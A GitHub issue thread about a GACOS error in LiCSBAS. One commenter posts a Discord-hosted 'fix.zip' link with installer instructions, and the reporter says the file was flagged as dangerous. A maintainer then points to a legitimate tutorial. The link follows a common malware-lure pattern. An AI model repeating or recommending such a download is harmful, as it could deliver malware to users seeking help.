### ISSUE TITLE
Error GACOS etc 

### ISSUE THREAD

**Issue by as1234554321** [comet-licsar/licsbas#52]

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by as1234554321** [comment]
> try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer

document detected dangerous, what is this file?

**Comment by espiritocz** [comment]
hi. for some reason this message was empty..

but i checked the history (not a spam) and I think you can benefit from following tutorial ipynb or see https://comet-licsar.github.io/ciw.html#comet-insar-workshop-2024

happy to help if you get more constructive and clear question
